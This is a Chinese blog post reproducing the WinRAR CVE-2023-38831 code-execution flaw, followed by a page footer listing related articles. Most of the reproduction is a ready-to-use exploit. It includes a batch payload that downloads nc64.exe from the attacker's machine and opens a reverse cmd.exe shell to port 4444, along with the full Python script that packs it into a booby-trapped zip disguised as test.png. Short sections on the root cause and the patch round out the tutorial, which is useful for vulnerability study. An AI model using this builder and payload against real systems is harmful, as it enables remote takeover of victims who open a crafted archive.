CVE漏洞复现-CVE-2023-38831 WinRAR代码执行漏洞

最新推荐文章于 2024-03-06 18:37:57 发布
最新推荐文章于 2024-03-06 18:37:57 发布
阅读量864 收藏 7
点赞数 4
分类专栏: CVE漏洞复现 文章标签: winrar 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_64973687/article/details/134069211
版权

CVE-2023-38831 WinRAR代码执行漏洞

WinRAR介绍

WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。
该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。

从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。

漏洞概况

WinRAR是一款文件压缩器,该产品支持RAR、ZIP等格式文件的压缩和解压等。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码。

RARLabs WinRAR 6.23之前版本存在安全漏洞,攻击者利用该漏洞可以执行任意代码。

漏洞影响

  • WinRAR < 6.23
  • 影响级别:千万级

漏洞复现

首先我们启动一个Kali虚拟机,将nc64.exe上传到虚拟机中相应的目录下,然后执行以下的代码,启动HTTP服务监听,让受害者的机器可以下载该程序

python -m http.server

在这里插入图片描述

然后我们在Kali机器上再打开一个新的终端,然后执行以下的代码启动端口监听

nc -lnvp 4444

在这里插入图片描述

接下来我们来制作POC文件,我们也可以直接用现成的利用脚本CVE-2023-38831-winrar-exploit,或者这里我为大家提供了漏洞环境,大家可以直接下载(二选一)现成的漏洞和利用环境

首先我们在受害者的机器上制作一个script.bat执行文件,文件内容如下:

curl http://KaliIP:8000/nc64.exe -O nc64.exe & nc64.exe KaliIP 4444 -e cmd.exe -d & test.png

然后我们需要在受害者的机器上准备一个make.py的文件,代码内容如下:

import shutil
import os, sys
from os.path import join
TEMPLATE_NAME = "TEMPLATE"
OUTPUT_NAME = "poc.zip"

BAIT_NAME = "test.png"
SCRIPT_NAME = "script.bat"

if len(sys.argv) > 3:
    BAIT_NAME = os.path.basename(sys.argv[1])
    SCRIPT_NAME = os.path.basename(sys.argv[2])
    OUTPUT_NAME = os.path.basename(sys.argv[3])
elif len(sys.argv) == 2 and sys.argv[1] == "poc":
    pass
else:
    print("""Usage:
          python .\make.py poc
          python .\make.py <BAIT_NAME> <SCRIPT_NAME> <OUTPUT_NAME>""")
    sys.exit()

BAIT_EXT = b"." + bytes(BAIT_NAME.split(".")[-1], "utf-8")

print("BAIT_NAME:", BAIT_NAME)
print("SCRIPT_NAME:", SCRIPT_NAME)
print("OUTPUT_NAME:", OUTPUT_NAME)

if os.path.exists(TEMPLATE_NAME):
    shutil.rmtree(TEMPLATE_NAME)
os.mkdir(TEMPLATE_NAME)
d = join(TEMPLATE_NAME, BAIT_NAME + "A")
if not os.path.exists(d):
    os.mkdir(d)

shutil.copyfile(join(SCRIPT_NAME), join(d, BAIT_NAME+"A.cmd"))
shutil.copyfile(join(BAIT_NAME), join(TEMPLATE_NAME, BAIT_NAME+"B"))

# if os.path.exists(OUTPUT_NAME):
#     print("!!! dir %s exists, delete it first" %(OUTPUT_NAME))
#     sys.exit()

shutil.make_archive(TEMPLATE_NAME, 'zip', TEMPLATE_NAME)

with open(TEMPLATE_NAME + ".zip", "rb") as f:
    content = f.read()
    content = content.replace(BAIT_EXT + b"A", BAIT_EXT + b" ")
    content = content.replace(BAIT_EXT + b"B", BAIT_EXT + b" ")

os.remove(TEMPLATE_NAME + ".zip")

with open(OUTPUT_NAME, "wb")  as f:
    f.write(content)

print("ok..")

然后我们在准备一张名为test.png的图片,将这三样文件置于同一目录下

在这里插入图片描述

然后在该目录下,打开终端执行以下的命令生成名为poc.zip的利用文件

python .\make.py test.png script.bat poc.zip

在这里插入图片描述

接下来,我们需要用WinRAR(<=6.22)存在漏洞的软件中打开POC文件,双击普通文件,漏洞触发(运行script.bat内容、下载nc64.exe、建立反弹连接)

在这里插入图片描述

进入WinRAR软件后,我们可以通过帮助选项查看当前的RAR软件版本,可以看到我们当前的软件版本是 6.22,是存在漏洞的版本

在这里插入图片描述

接下来,我们只需要去双击test.png文件打开它

在这里插入图片描述

然后我们就会发现启动了一个终端窗口

在这里插入图片描述

同时我们的Kali机器也收到了受害者机器的Shell终端

在这里插入图片描述

漏洞原理

当受害者尝试打开存档文件中的"test.png "时,WinRAR会比较存档中的所有文件以查找与"test.png "同名的文件/目录,如果存在与"test.png "同名的目录,WinRAR则会继续检查"test.png /"目录下的文件,如果"test.png /"目录下同样存在文件名为"test.png "的文件则将"test.png /"目录下"test.png "文件放入提取列表中,最终导致压缩包中的test.png .cmd被解压出来,并且
运行。

关于漏洞原理的详细部分可以看这篇文章CVE-2023-38831 WinRAR 逻辑漏洞原因分析

漏洞修复

将WinRAR软件版本更新至最新版本即可

千负
关注
  • 4
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CVE-2023-38831漏洞实例
yellow的博客
10-20 181
CVE-2023-38831漏洞实例分析
CVE-2023-38831 WinRAR 远程代码执行漏洞 0Day PoC
08-25
CVE-2023-38831 漏洞位于ZIP文件的处理过程,攻击者可以制作恶意.ZIP或.RAR压缩文件,其中包含无害文件(例如.jpg、.txt或PDF文件等)及恶意执行文件,并以无害文件名为文件夹命名。当用户点击并试图解压缩看似合法的文件时,即被安装恶意程序。 该漏洞产生的根源在于对用户提供的数据缺乏适当的验证,这会引发分配的缓存背后的内存访问。漏洞利用需要用户交互,即攻击者需要访问恶意页面或打开精心伪造的RAR文件。但从实际攻击场景来说,欺骗用户执行必要的交互操作并不难。 RARLAB已于2023年8月2日发布了WinRAR v 6.23版本,建议用户尽快安装安全更新。 鉴于此类漏洞可被用于进一步攻击活动,微软已经开始测试Windows 11系统对RAR、7-Zip和GZ等压缩文件格式的支持,未来系统将无需安装WinRAR这样的第三方软件,以减少可能的攻击面。 CVE-2023-38831漏洞执行Windows CMD脚本,来源:BleepingComputer 该漏洞是通过创建与安全文件相比结构略有修改的特制存档而触发的,这会导致 WinRAR 的 ShellExecu
CVE-2023-21839远程代码执行漏洞
刘家华(游戏开发)
05-01 1466
weblogic CVE-2023-21839、CVE-2023-21931、CVE-2023-21979远程代码执行漏洞复现
CVE-2021-3156 漏洞复现笔记
weixin_46483787的博客
07-01 9799
CVE-2021-3156复现笔记
CVE-2023-38831(Winrar RCE)漏洞复现与分析
m0_55994898的博客
12-10 1493
本文对Winrar RCE漏洞(CVE-2023-38831)进行复现以及原理分析,对攻击过程进行还原,让你更直观的感受此漏洞的攻击面。对于Reverse本人并不擅长,所以此篇文章参考了很多互联网公开的对此漏洞的研究分析报告,文末标注。
CVE-2023-38831 WinRAR 逻辑漏洞原因分析
CuiXY's Blog
08-29 1531
漏洞编号:CVE-2023-38831 漏洞类型:逻辑漏洞 软件名称:RARLAB WinRAR 模块名称:WinRAR.exe 历史漏洞:根据 vuldb 显示,历史漏洞并不是很多,能稳定利用的更是少之又少
WinRAR 0day CVE-2023-38831分析复现及poc
yuanlirong22的专栏
08-27 2223
最近WinRARCVE-2023-38831 漏洞被在野利用POC已可使用。漏洞影响版本:WinRa
WinRAR CVE-2023-38831简单复现
潇湘信安的博客
09-18 288
CVE-2023-38831漏洞2023 年 4 月至 2023 年 8 月期间在野外被利用。当用户尝试查看 ZIP 存档中的良性文件时,WinRAR 6.23之前的版本允许攻击者执行任意代码。出现此问题的原因是 ZIP 存档可能包含良性文件(例如普通 .JPG 文件)以及与良性文件同名的文件夹,并且处理该文件夹的内容(可能包括可执行内容)在尝试仅访问良性文件期间。
漏洞复现RARLAB WinRAR 代码执行漏洞RCE (CVE-2023-38831)
做自己喜欢的事,并将其发挥到极致!
09-11 641
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RARWindows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。WinRAR在处理压缩包内同名的文件与文件夹时代码执行漏洞,攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件后,将在受害者机器上执行任意代码
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
WinRAR 拥有超过 500 亿用户,面临新漏洞CVE-2023-40477、CVE-2023-38831)。 今天,我们首次展示:CVE-2023-40477 的 PoC。 尽管 RCE 被认为是可利用的,但由于多种原因,其在实现过程中看起来并不乐观。 我们在此展示全面的技术研究:其影响、可利用的场景和缓解措施。 该漏洞已在最近的 WinRAR v6.23 中修复,我们在这里还提供了另一种缓解措施。 ​ ​ 尽管其 CVE 等级很高,但成功利用所需的复杂性表明广泛滥用的可能性很低,这与广泛利用的 Log4j RCE 漏洞不同。  有趣的是,Chromium似乎也利用了unrar库:https://chromium.googlesource.com/chromium/src//6ff23b0604e2edbe7ef282564ea340f5c72ab91a^/ unrar库作为第三方依赖项合并到Chrome OS中是合理的,尽管没有显示其用法的代码引用。 在缓解策略方面,有几种可行的选择可供考虑: 完全修复:将 Winrar 更新到 6.23+ 将完全修复该问题。 修补程序
中间件安全-CVE漏洞复现-Docker+Websphere+Jetty
xiaoheizi的博客
07-15 504
如果拿下的shell是docker容器的,就要进行docker逃逸来获取宿主机shell,因为在docker容器执行命令影响不到宿主机。Docker容器是使用沙盒机制,是单独的系统,理论上是很安全的,通过利用某种手段,再结合执行POC或EXP,就可以返回一个宿主机的高权限Shell,并拿到宿主机的root权限,可以直接操作宿主机文件。信息泄露路径:http://目标ip:端口/%u002e/WEB-INF/web.xml。信息泄露路径:http://目标ip:端口/%2e/WEB-INF/web.xml。
winrar(CVE-2023-38831)漏洞原理
最新发布
如需功能开发提供开发说明,请发送邮件至[email protected]
03-06 718
触发该漏洞的完整调用链大致如上所述,究其原因还是Winrar程序本身在双击文件预览时错误的释放逻辑,以及WindowsApi Shellexecute在根据后缀名寻找相应执行文件时触发本地搜索的特性,二者结合才形成了完整的漏洞利用链条。
WinRAR<6.23 远程代码执行漏洞【Poc公开】(CVE-2023-38831) [有POC]
OSCS开源安全社区
08-28 291
墨知是国内首个专注软件供应链安全领域的技术社区,社区致力于为国内数百万技术人员提供全方位的软件供应链安全专业知识内容,包括软件供应链安全技术、漏洞情报、开源组件安全、SBOM、软件成分分析(SCA)、开源许可证合规等前沿技术及最佳实践。墨知通过促进知识共享、技术研究和合作交流,帮助组织和个人提高软件供应链的安全性,减少供应链攻击的风险,并保护软件生态系统的整体安全。
WinRAR代码执行漏洞(CVE-2023-38831)
qq_42751192的博客
08-29 396
WinRAR 在处理压缩包内同名的文件与文件夹时存在代码执行漏洞。攻击者构建由恶意文件与非恶意文件构成的特制压缩包文件,诱导受害者打开此文件中看似无害的文件(如JPG文件)后,将在受害者机器上执行任意代码
CVE-2022-30190 漏洞复现
weixin_53884648的博客
11-10 5033
通过exp实现了对微软目前存在的office-word-2016的成功复现
cve-2023-36844
01-26
CVE-2023-36844是一种安全漏洞,它影响某个特定的软件或系统。根据CVE命名规则,它是在2023年被发现和分配的漏洞编号。 关于CVE-2023-36844漏洞的具体详情,由于缺乏具体信息,我无法提供详细的漏洞描述。通常,CVE漏洞编号用于标识软件或系统中的安全问题,以便用户、开发人员和安全研究人员能够更好地了解漏洞的性质和潜在风险。 如果我要提供有关CVE-2023-36844的建议,我会强烈建议用户尽快更新相关软件或系统,以修复这个安全漏洞。此外,我还建议用户保持良好的网络安全实践,包括定期备份数据、注意不明来源的链接和附件、使用强密码以及确保及时应用软件更新和补丁程序。 最重要的是,对于任何潜在的安全漏洞,请保持关注并及时了解相关软件或系统厂商的安全更新和建议。与此同时,如果有任何疑问或需要进一步的帮助,建议寻求专业的安全机构或安全专家的意见。 总之,CVE-2023-36844是一个特定软件或系统的漏洞编号,我建议用户关注更新以及采取必要的网络安全措施以保护个人和组织的信息安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

千负

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值